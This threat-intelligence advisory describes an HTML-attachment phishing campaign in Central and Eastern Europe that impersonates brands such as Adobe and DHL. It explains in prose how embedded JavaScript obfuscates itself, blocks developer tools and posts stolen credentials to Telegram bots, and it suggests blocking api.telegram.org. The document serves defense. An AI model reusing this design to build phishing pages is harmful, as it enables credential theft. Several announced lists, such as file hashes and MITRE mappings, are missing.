Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
A sophisticated phishing campaign is actively targeting organizations across Central and Eastern Europe, leveraging specially crafted HTML attachments to steal user credentials through advanced social engineering tactics. This credential theft operation bypasses traditional security controls by embedding malicious JavaScript directly within HTML files, eliminating the need for external malicious links or remote command-and-control servers.
The phishing campaign impersonates trusted global brands including Adobe, Microsoft, FedEx, DocuSign, DHL, WeTransfer, and Telekom Deutschland to deceive victims into entering login credentials on convincing fake authentication pages. Stolen credentials are immediately exfiltrated to attacker-controlled Telegram bots, creating a fast, low-cost, and difficult-to-trace credential harvesting infrastructure.
This HTML-based phishing attack demonstrates significant evolution in cybercrime methodology, combining regional customization, realistic business communication lures, and anti-analysis techniques to breach even well-protected enterprise environments. The campaign has been assigned Threat Level Red with Admiralty Code A1, indicating highly reliable intelligence about an imminent and severe cybersecurity threat.
Targeted Industries: Agriculture & Livestock, Automotive, Construction, Consumer Goods, Education, Energy & Utilities, Government & Law Enforcement, Hospitality, IT & IT-Enabled Services, Manufacturing, Media & Entertainment, Professional Services, Retail, Telecommunications, Technology
Affected Regions: Czech Republic, Slovakia, Hungary, Germany, and broader Central and Eastern European territories
This credential theft campaign represents a departure from traditional phishing methodologies by delivering self-contained malicious HTML files via email attachments rather than relying on compromised websites or phishing URLs. The HTML attachments use RFC-compliant filenames or are compressed into ZIP archives to appear legitimate and bypass email security filters that typically flag suspicious file types.
When victims open these phishing attachments, they encounter a convincing counterfeit Adobe login interface prompting users to “sign in to view” an attached document. This social engineering tactic exploits the common business practice of sharing documents through cloud services, making the credential harvesting attempt appear routine and trustworthy.
The technical sophistication of this phishing campaign centers on its use of embedded JavaScript to capture and exfiltrate credentials entirely within the HTML file itself. This design choice enables the attack to show minimal external network activity until the moment credentials are transmitted to Telegram, significantly reducing detection opportunities for security monitoring tools.
Two distinct malware variants have been identified demonstrating evolving levels of technical refinement:
Sample 1 (Advanced Variant): Implements CryptoJS AES encryption to obfuscate malicious code, making static analysis more difficult. This variant captures not only usernames and passwords but also victim IP addresses and browser fingerprinting data through external APIs. The credential theft mechanism includes a deceptive “incorrect password” error message, prompting victims to re-enter credentials and ensuring data accuracy for attackers.
Sample 2 (Streamlined Variant): Uses the native JavaScript Fetch API for a more efficient credential exfiltration process. This variant integrates sophisticated anti-analysis techniques that actively block developer tools shortcuts (F12, Ctrl+Shift+I), preventing security-conscious users from inspecting the malicious JavaScript code embedded in the HTML phishing page.
Upon credential submission, victims unknowingly trigger a JavaScript-based POST request that sends their authentication data directly to the Telegram Bot API using hardcoded bot tokens and chat IDs. This exfiltration method offers attackers several operational advantages:
Analysis revealed a network of distinct Telegram bots, each employing unique tokens with different behavioral patterns, indicating either a coordinated threat actor group or a phishing-as-a-service model where multiple cybercriminals share common attack infrastructure.
The phishing campaign demonstrates sophisticated localization strategies, adapting communication styles and branding to match regional business practices across Central and Eastern Europe. The threat actors meticulously replicate the visual identity of globally recognized brands, with many HTML templates sharing consistent design elements such as Adobe-styled authentication modals and blurred invoice backgrounds.
This visual consistency across multiple phishing samples suggests the probable use of an automated phishing generator toolkit or standardized template library, enabling rapid campaign scaling while maintaining credible brand impersonation. The attackers blend localized language with internationally recognized corporate identities, creating a scalable credential theft infrastructure designed for maximum reach and victim trust.
The phishing campaign’s success stems from several key evasion capabilities:
This combination creates a highly scalable, cost-effective credential theft operation that successfully evades traditional signature-based detection systems and URL filtering technologies commonly deployed in enterprise security architectures.
Be Cautious with HTML Attachments: Organizations should implement strict policies regarding HTML and ZIP attachments, especially those claiming to contain invoices, quotations, or shared documents. Security awareness training must emphasize that unexpected HTML attachments should be treated as suspicious until verified through trusted communication channels independent of email.
Verify Before You Click or Sign In: When any email requests credential entry to “sign in to view” a document, employees must confirm the request directly with the sender using a known email address or phone number from official company directories—never by replying to the suspicious email. Genuine companies rarely require authentication through attached files, making this a significant red flag for phishing attempts.
Restrict Telegram API Access: Given the widespread use of Telegram bots for credential exfiltration in this campaign, network administrators should evaluate blocking Telegram’s API endpoints at the firewall or proxy level where operationally feasible. In enterprise environments where Telegram has no legitimate business use case, preventing outbound connections to api.telegram.org can effectively disrupt this exfiltration channel.
Enable Multi-factor Authentication (MFA): Even when credentials are successfully stolen through phishing attacks, multi-factor authentication provides a critical secondary defense layer preventing unauthorized account access. Organizations must enforce MFA across all critical business systems, privileged accounts, and cloud services to minimize credential theft impact.
Enhance Endpoint Protection: Deploy next-generation antivirus (NGAV) solutions and endpoint detection and response (EDR) platforms capable of identifying malicious behavior rather than relying solely on signature-based detection. Leverage behavioral analysis engines and machine learning-based threat detection to identify suspicious JavaScript execution patterns and unusual data exfiltration attempts characteristic of this phishing campaign.
Organizations should prioritize security solutions that can analyze HTML file contents, detect obfuscated JavaScript, and identify anomalous network communications even when encrypted through legitimate services like Telegram.
The following SHA256 file hashes represent confirmed malicious HTML phishing attachments associated with this credential theft campaign:
Organizations should integrate these file hash indicators into endpoint protection platforms, email security gateways, and threat intelligence feeds to enable automated detection and blocking of known malicious phishing attachments.
Note: Additional IoC indicators are available through the complete threat intelligence report on the HivePro platform.
This credential theft campaign maps to the following MITRE ATT&CK Tactics, Techniques, and Procedures (TTPs):
Security teams should leverage these MITRE ATT&CK mappings to validate detection capabilities, tune security monitoring rules, and assess organizational resilience against this specific phishing campaign methodology.
https://cyble.com/blog/multi-brand-phishing-campaign-harvests-credentials/
Get through updates and upcoming events, and more directly in your inbox